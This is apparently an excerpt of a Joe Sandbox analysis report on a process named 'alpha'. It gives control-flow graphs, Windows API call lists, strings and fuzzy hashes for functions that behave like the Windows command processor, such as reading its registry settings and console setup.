17827->17828 17828->17829 17829->17712 17829->17829 17831 7ff789bd2e11 17830->17831 17832 7ff789bd2e32 17830->17832 17831->17832 17833 7ff789bde494 VirtualFree 17831->17833 17832->17816 17835 7ff789bd1ec4 17834->17835 17836 7ff789bd1eae wcschr 17834->17836 17835->17822 17836->17835 17838 7ff789bd1ece 17836->17838 17837 7ff789bd1f3f 17837->17822 17838->17837 17839 7ff789bd9158 7 API calls 17838->17839 17840 7ff789bd1f53 17839->17840 17843 7ff789bd04a4 17841->17843 17844 7ff789bd04b9 _get_osfhandle SetFilePointer 17843->17844 17845 7ff789bdd845 17843->17845 17847 7ff789bdd839 17843->17847 17849 7ff789bc3278 166 API calls 17843->17849 18022 7ff789bd26e0 17843->18022 17844->17783 18047 7ff789bef1d8 17845->18047 17848 7ff789bc3278 166 API calls 17847->17848 17850 7ff789bdd837 17848->17850 17851 7ff789bdd819 _getch 17849->17851 17851->17843 17852 7ff789bdd832 17851->17852 18046 7ff789bebde4 EnterCriticalSection LeaveCriticalSection 17852->18046 17855 7ff789bcdf93 17854->17855 17856 7ff789bcdfe2 17854->17856 17855->17856 17857 7ff789bcdf9f GetProcessHeap RtlFreeHeap 17855->17857 17858 7ff789bce100 VirtualFree 17856->17858 17859 7ff789bce00b _setjmp 17856->17859 17857->17855 17857->17856 17858->17856 17860 7ff789bce0c3 17859->17860 17861 7ff789bce04a 17859->17861 17860->17749 18056 7ff789bce600 17861->18056 17863 7ff789bce073 17864 7ff789bce0e0 longjmp 17863->17864 17865 7ff789bce081 17863->17865 17866 7ff789bce0b0 17864->17866 18065 7ff789bcd250 17865->18065 17866->17860 18096 7ff789bed3fc 17866->18096 17871 7ff789bce600 473 API calls 17872 7ff789bce0a7 17871->17872 17872->17866 17873 7ff789bed610 167 API calls 17872->17873 17873->17866 17875 7ff789bd05d5 17874->17875 17876 7ff789bd05ed _get_osfhandle GetConsoleMode 17874->17876 17875->17876 17877 7ff789bd0677 _get_osfhandle SetConsoleMode 17875->17877 17878 7ff789bd0615 17876->17878 17879 7ff789bd0653 17876->17879 17877->17876 17881 7ff789bd06ad 17877->17881 17878->17879 17880 7ff789bd0624 _get_osfhandle SetConsoleMode 
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
• Instruction ID: d48eca7e991860eda796c8a2fffa1c179bb5fca4273eef60afd397f036cc33b0
• Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
• Instruction Fuzzy Hash: AD42C521B0C68A85FA54BF6198182B9ABB1FF85F96FA44134D95E47BD4DF3CE044C320
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
• String ID: :$:$:$:ON$OFF
• API String ID: 4076514806-467788257
• Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction ID: 4969cf3e28070cadd62036cb1f5d724d4f6e4ec7f615cebaf54532959e42d219
• Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction Fuzzy Hash: 9122A321A0865B86EB64BF259514279EEB1FF85F97FE88135CA0E47794EF3CA440C360
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: InfoLocale$DefaultLangUsersetlocale
• String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
• API String ID: 2492766124-2236139042
• Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction ID: ae2202a0480b99ed464ef0b5070acc91f0aabaf930c9c4a830528453e193ca86
• Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction Fuzzy Hash: BCF16C61B1874A85EF21AF25E9182B9AAB4BF45F82FE44136CA0D47794EF3CE505C360
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
• String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
• API String ID: 388421343-2905461000
• Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
• Instruction ID: b4e903eed802f40e9525ce57264badc599e2c24fa786fcd63b5b36c69964f04a
• Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
• Instruction Fuzzy Hash: BEF14131A09B8A86EA60AF11E4487B9FBB5FB85F92FA44135D94D43794DF3CE444CB20
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 579 7ff789bd5554-7ff789bd55b9 call 7ff789bda640 582 7ff789bd55bc-7ff789bd55e8 RegOpenKeyExW 579->582 583 7ff789bd55ee-7ff789bd5631 RegQueryValueExW 582->583 584 7ff789bd5887-7ff789bd588e 582->584 585 7ff789bdf248-7ff789bdf24d 583->585 586 7ff789bd5637-7ff789bd5675 RegQueryValueExW 583->586 584->582 587 7ff789bd5894-7ff789bd58db time srand call 7ff789bd8f80 584->587 591 7ff789bdf260-7ff789bdf265 585->591 592 7ff789bdf24f-7ff789bdf25b 585->592 588 7ff789bd568e-7ff789bd56cc RegQueryValueExW 586->588 589 7ff789bd5677-7ff789bd567c 586->589 596 7ff789bdf2b6-7ff789bdf2bb 588->596 597 7ff789bd56d2-7ff789bd5710 RegQueryValueExW 588->597 594 7ff789bd5682-7ff789bd5687 589->594 595 7ff789bdf28b-7ff789bdf290 589->595 591->586 593 7ff789bdf26b-7ff789bdf286 _wtol 591->593 592->586 593->586 594->588 595->588 599 7ff789bdf296-7ff789bdf2b1 _wtol 595->599 600 7ff789bdf2ce-7ff789bdf2d3 596->600 601 7ff789bdf2bd-7ff789bdf2c9 596->601 602 7ff789bd5712-7ff789bd5717 597->602 603 7ff789bd5729-7ff789bd5767 RegQueryValueExW 597->603 599->588 600->597 604 7ff789bdf2d9-7ff789bdf2f4 _wtol 600->604 601->597 605 7ff789bd571d-7ff789bd5722 602->605 606 7ff789bdf2f9-7ff789bdf2fe 602->606 607 7ff789bd579f-7ff789bd57dd RegQueryValueExW 603->607 608 7ff789bd5769-7ff789bd576e 603->608 604->597 605->603 606->603 611 7ff789bdf304-7ff789bdf31a wcstol 606->611 609 7ff789bd57e3-7ff789bd57e8 607->609 610 7ff789bdf3a9 607->610 612 7ff789bd5774-7ff789bd578f 608->612 613 7ff789bdf320-7ff789bdf325 608->613 616 7ff789bdf363-7ff789bdf368 609->616 617 7ff789bd57ee-7ff789bd5809 609->617 624 7ff789bdf3b5-7ff789bdf3b8 610->624 611->613 614 7ff789bd5795-7ff789bd5799 612->614 615 7ff789bdf357-7ff789bdf35e 612->615 618 7ff789bdf34b 613->618 619 7ff789bdf327-7ff789bdf33f wcstol 613->619 614->607 614->615 615->607 620 7ff789bdf38e 616->620 621 7ff789bdf36a-7ff789bdf382 wcstol 616->621 622 
7ff789bd580f-7ff789bd5813 617->622 623 7ff789bdf39a-7ff789bdf39d 617->623 618->615 619->618 620->623 621->620 622->623 625 7ff789bd5819-7ff789bd5823 622->625 623->610 626 7ff789bd582c 624->626 627 7ff789bdf3be-7ff789bdf3c5 624->627 625->624 628 7ff789bd5829 625->628 629 7ff789bd5832-7ff789bd5870 RegQueryValueExW 626->629 630 7ff789bdf3ca-7ff789bdf3d1 626->630 627->629 628->626 631 7ff789bd5876-7ff789bd5882 RegCloseKey 629->631 632 7ff789bdf3dd-7ff789bdf3e2 629->632 630->632 631->584 633 7ff789bdf3e4-7ff789bdf412 ExpandEnvironmentStringsW 632->633 634 7ff789bdf433-7ff789bdf439 632->634 635 7ff789bdf414-7ff789bdf426 call 7ff789bd13e0 633->635 636 7ff789bdf428 633->636 634->631 637 7ff789bdf43f-7ff789bdf44c call 7ff789bcb900 634->637 639 7ff789bdf42e 635->639 636->639 637->631 639->634
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue$CloseOpensrandtime
                                                                                                                    • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                    • API String ID: 145004033-3846321370
                                                                                                                    • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                    • Instruction ID: 80abdf1a29dad377d8dae6f07b4cd7864bf9554a47194cd5cc6fd5bbaefcd3e6
                                                                                                                    • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                    • Instruction Fuzzy Hash: B2E1953252DA8AC6E750AF10E45457AFBB0FB89B52FE05135E68E02A58EF7CD544CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 821 7ff789bd37d8-7ff789bd3887 GetCurrentThreadId OpenThread call 7ff789bd04f4 HeapSetInformation RegOpenKeyExW 824 7ff789bd388d-7ff789bd38eb call 7ff789bd5920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff789bde9f8-7ff789bdea3b RegQueryValueExW RegCloseKey 821->825 828 7ff789bdea41-7ff789bdea59 GetThreadLocale 824->828 829 7ff789bd38f1-7ff789bd3913 memset 824->829 825->828 830 7ff789bdea74-7ff789bdea77 828->830 831 7ff789bdea5b-7ff789bdea67 828->831 832 7ff789bdeaa5 829->832 833 7ff789bd3919-7ff789bd3935 call 7ff789bd4d5c 829->833 834 7ff789bdea94-7ff789bdea96 830->834 835 7ff789bdea79-7ff789bdea7d 830->835 831->830 838 7ff789bdeaa8-7ff789bdeab4 832->838 841 7ff789bdeae2-7ff789bdeaff call 7ff789bc3240 call 7ff789be8530 call 7ff789bd4c1c 833->841 842 7ff789bd393b-7ff789bd3942 833->842 834->832 835->834 837 7ff789bdea7f-7ff789bdea89 835->837 837->834 838->833 840 7ff789bdeaba-7ff789bdeac3 838->840 843 7ff789bdeacb-7ff789bdeace 840->843 853 7ff789bdeb00-7ff789bdeb0d 841->853 847 7ff789bdeb27-7ff789bdeb40 _setjmp 842->847 848 7ff789bd3948-7ff789bd3962 _setjmp 842->848 844 7ff789bdeac5-7ff789bdeac9 843->844 845 7ff789bdead0-7ff789bdeadb 843->845 844->843 845->838 851 7ff789bdeadd 845->851 849 7ff789bdeb46-7ff789bdeb49 847->849 850 7ff789bd39fe-7ff789bd3a05 call 7ff789bd4c1c 847->850 848->853 854 7ff789bd3968-7ff789bd396d 848->854 855 7ff789bdeb66-7ff789bdeb6f call 7ff789bd01b8 849->855 856 7ff789bdeb4b-7ff789bdeb65 call 7ff789bc3240 call 7ff789be8530 call 7ff789bd4c1c 849->856 850->825 851->833 866 7ff789bdeb15-7ff789bdeb1f call 7ff789bd4c1c 853->866 858 7ff789bd396f 854->858 859 7ff789bd39b9-7ff789bd39bb 854->859 880 7ff789bdeb71-7ff789bdeb82 _setmode 855->880 881 7ff789bdeb87-7ff789bdeb89 call 7ff789bd86f0 855->881 856->855 867 7ff789bd3972-7ff789bd397d 858->867 862 7ff789bdeb20 859->862 863 7ff789bd39c1-7ff789bd39c3 call 7ff789bd4c1c 
859->863 862->847 877 7ff789bd39c8 863->877 866->862 874 7ff789bd397f-7ff789bd3984 867->874 875 7ff789bd39c9-7ff789bd39de call 7ff789bcdf60 867->875 874->867 883 7ff789bd3986-7ff789bd39ae call 7ff789bd0580 GetConsoleOutputCP GetCPInfo call 7ff789bd04f4 874->883 875->866 889 7ff789bd39e4-7ff789bd39e8 875->889 877->875 880->881 890 7ff789bdeb8e-7ff789bdebad call 7ff789bd58e4 call 7ff789bcdf60 881->890 897 7ff789bd39b3 883->897 889->850 894 7ff789bd39ea-7ff789bd39ef call 7ff789bcbe00 889->894 902 7ff789bdebaf-7ff789bdebb3 890->902 900 7ff789bd39f4-7ff789bd39fc 894->900 897->859 900->874 902->850 903 7ff789bdebb9-7ff789bdec24 call 7ff789bd58e4 GetConsoleOutputCP GetCPInfo call 7ff789bd04f4 call 7ff789bcbe00 call 7ff789bd0580 GetConsoleOutputCP GetCPInfo call 7ff789bd04f4 902->903 903->890
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                    • API String ID: 2624720099-1920437939
                                                                                                                    • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                                                                                    • Instruction ID: 2436aa6c33d83ad91ce85a9e07408ea0eefe66a246b40004408f7d46e0cdb038
                                                                                                                    • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                                                                                    • Instruction Fuzzy Hash: CAC18C31E0868A8AF754BF7094481B8FEB1FF49F56FE44138DA1E46696EE3DA441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 1118 7ff789bd823c-7ff789bd829b FindFirstFileExW 1119 7ff789bd82cd-7ff789bd82df 1118->1119 1120 7ff789bd829d-7ff789bd82a9 GetLastError 1118->1120 1124 7ff789bd8365-7ff789bd837b FindNextFileW 1119->1124 1125 7ff789bd82e5-7ff789bd82ee 1119->1125 1121 7ff789bd82af 1120->1121 1122 7ff789bd82b1-7ff789bd82cb 1121->1122 1126 7ff789bd83d0-7ff789bd83e5 FindClose 1124->1126 1127 7ff789bd837d-7ff789bd8380 1124->1127 1128 7ff789bd82f1-7ff789bd82f4 1125->1128 1126->1128 1127->1119 1129 7ff789bd8386 1127->1129 1130 7ff789bd82f6-7ff789bd8300 1128->1130 1131 7ff789bd8329-7ff789bd832b 1128->1131 1129->1120 1133 7ff789bd8332-7ff789bd8353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff789bd8302-7ff789bd830e 1130->1134 1131->1121 1132 7ff789bd832d 1131->1132 1132->1120 1135 7ff789bd8356-7ff789bd8363 1133->1135 1136 7ff789bd8310-7ff789bd8313 1134->1136 1137 7ff789bd838b-7ff789bd83c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1140 7ff789bd8315-7ff789bd8323 1136->1140 1141 7ff789bd8327 1136->1141 1138 7ff789be50f8-7ff789be511e GetLastError FindClose 1137->1138 1139 7ff789bd83c8-7ff789bd83ce 1137->1139 1138->1122 1139->1135 1140->1141 1141->1131
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 873889042-0
                                                                                                                    • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                    • Instruction ID: 196cf54ec60c38fdba15b431657db5115ae316bfc1b8da5665afffb6fb90c31e
                                                                                                                    • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                    • Instruction Fuzzy Hash: 81510776A09B8A86E740AF12E444579BFB0FB8AF92FA48131DA1D43790DF3DE454C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 1142 7ff789bd2978-7ff789bd29b6 1143 7ff789bd29b9-7ff789bd29c1 1142->1143 1143->1143 1144 7ff789bd29c3-7ff789bd29c5 1143->1144 1145 7ff789bde441 1144->1145 1146 7ff789bd29cb-7ff789bd29cf 1144->1146 1147 7ff789bd29d2-7ff789bd29da 1146->1147 1148 7ff789bd29dc-7ff789bd29e1 1147->1148 1149 7ff789bd2a1e-7ff789bd2a3e FindFirstFileW 1147->1149 1148->1149 1152 7ff789bd29e3-7ff789bd29eb 1148->1152 1150 7ff789bd2a44-7ff789bd2a5c FindClose 1149->1150 1151 7ff789bde435-7ff789bde439 1149->1151 1153 7ff789bd2ae3-7ff789bd2ae5 1150->1153 1154 7ff789bd2a62-7ff789bd2a6e 1150->1154 1151->1145 1152->1147 1155 7ff789bd29ed-7ff789bd2a1c call 7ff789bd8f80 1152->1155 1157 7ff789bd2aeb-7ff789bd2b10 _wcsnicmp 1153->1157 1158 7ff789bde3f7-7ff789bde3ff 1153->1158 1156 7ff789bd2a70-7ff789bd2a78 1154->1156 1156->1156 1160 7ff789bd2a7a-7ff789bd2a8d 1156->1160 1157->1154 1161 7ff789bd2b16-7ff789bde3f1 _wcsicmp 1157->1161 1160->1145 1163 7ff789bd2a93-7ff789bd2a97 1160->1163 1161->1154 1161->1158 1165 7ff789bde404-7ff789bde407 1163->1165 1166 7ff789bd2a9d-7ff789bd2ade memmove call 7ff789bd13e0 1163->1166 1168 7ff789bde40b-7ff789bde413 1165->1168 1166->1152 1168->1168 1169 7ff789bde415-7ff789bde42b memmove 1168->1169 1169->1151
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                    • Instruction ID: 941d9827e2b7c2d94e2c204780a2ef4b77564c7aaa49dac1c8b8b3a0153c21b8
                                                                                                                    • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                    • Instruction Fuzzy Hash: 56511C61B0868A85EA30AF55954827AEA70FB54FE6FE45234DE6D077D0DF3CE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 643 7ff789bd4d5c-7ff789bd4e4b InitializeCriticalSection call 7ff789bd58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff789bd0580 call 7ff789bd4a14 call 7ff789bd4ad0 call 7ff789bd5554 GetCommandLineW 654 7ff789bd4e4d-7ff789bd4e54 643->654 654->654 655 7ff789bd4e56-7ff789bd4e61 654->655 656 7ff789bd51cf-7ff789bd51e3 call 7ff789bc3278 call 7ff789bd4c1c 655->656 657 7ff789bd4e67-7ff789bd4e7b call 7ff789bd2e44 655->657 663 7ff789bd4e81-7ff789bd4ec3 GetCommandLineW call 7ff789bd13e0 call 7ff789bcca40 657->663 664 7ff789bd51ba-7ff789bd51ce call 7ff789bc3278 call 7ff789bd4c1c 657->664 663->664 674 7ff789bd4ec9-7ff789bd4ee8 call 7ff789bd417c call 7ff789bd2394 663->674 664->656 678 7ff789bd4eed-7ff789bd4ef5 674->678 678->678 679 7ff789bd4ef7-7ff789bd4f1f call 7ff789bcaa54 678->679 682 7ff789bd4f95-7ff789bd4fee GetConsoleOutputCP GetCPInfo call 7ff789bd51ec GetProcessHeap HeapAlloc 679->682 683 7ff789bd4f21-7ff789bd4f30 679->683 688 7ff789bd4ff0-7ff789bd5006 GetConsoleTitleW 682->688 689 7ff789bd5012-7ff789bd5018 682->689 683->682 685 7ff789bd4f32-7ff789bd4f39 683->685 685->682 687 7ff789bd4f3b-7ff789bd4f77 call 7ff789bc3278 GetWindowsDirectoryW 685->687 698 7ff789bd51b1-7ff789bd51b9 call 7ff789bd4c1c 687->698 699 7ff789bd4f7d-7ff789bd4f90 call 7ff789bd3c24 687->699 688->689 691 7ff789bd5008-7ff789bd500f 688->691 692 7ff789bd507a-7ff789bd507e 689->692 693 7ff789bd501a-7ff789bd5024 call 7ff789bd3578 689->693 691->689 695 7ff789bd5080-7ff789bd50b3 call 7ff789beb89c call 7ff789bc586c call 7ff789bc3240 call 7ff789bd3448 692->695 696 7ff789bd50eb-7ff789bd5161 GetModuleHandleW GetProcAddress * 3 692->696 693->692 709 7ff789bd5026-7ff789bd5030 693->709 724 7ff789bd50b5-7ff789bd50d0 call 7ff789bd3448 * 2 695->724 725 7ff789bd50d2-7ff789bd50d7 call 7ff789bc3278 695->725 701 7ff789bd5163-7ff789bd5167 696->701 
702 7ff789bd516f 696->702 698->664 699->682 701->702 707 7ff789bd5169-7ff789bd516d 701->707 708 7ff789bd5172-7ff789bd51af free call 7ff789bd8f80 702->708 707->702 707->708 713 7ff789bd5075 call 7ff789becff0 709->713 714 7ff789bd5032-7ff789bd5059 GetStdHandle GetConsoleScreenBufferInfo 709->714 713->692 717 7ff789bd505b-7ff789bd5067 714->717 718 7ff789bd5069-7ff789bd5073 714->718 717->692 718->692 718->713 728 7ff789bd50dc-7ff789bd50e6 GlobalFree 724->728 725->728 728->696
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4D9A
                                                                                                                      • Part of subcall function 00007FF789BD58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF789BEC6DB), ref: 00007FF789BD58EF
                                                                                                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4DBB
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD4DCA
                                                                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4DE0
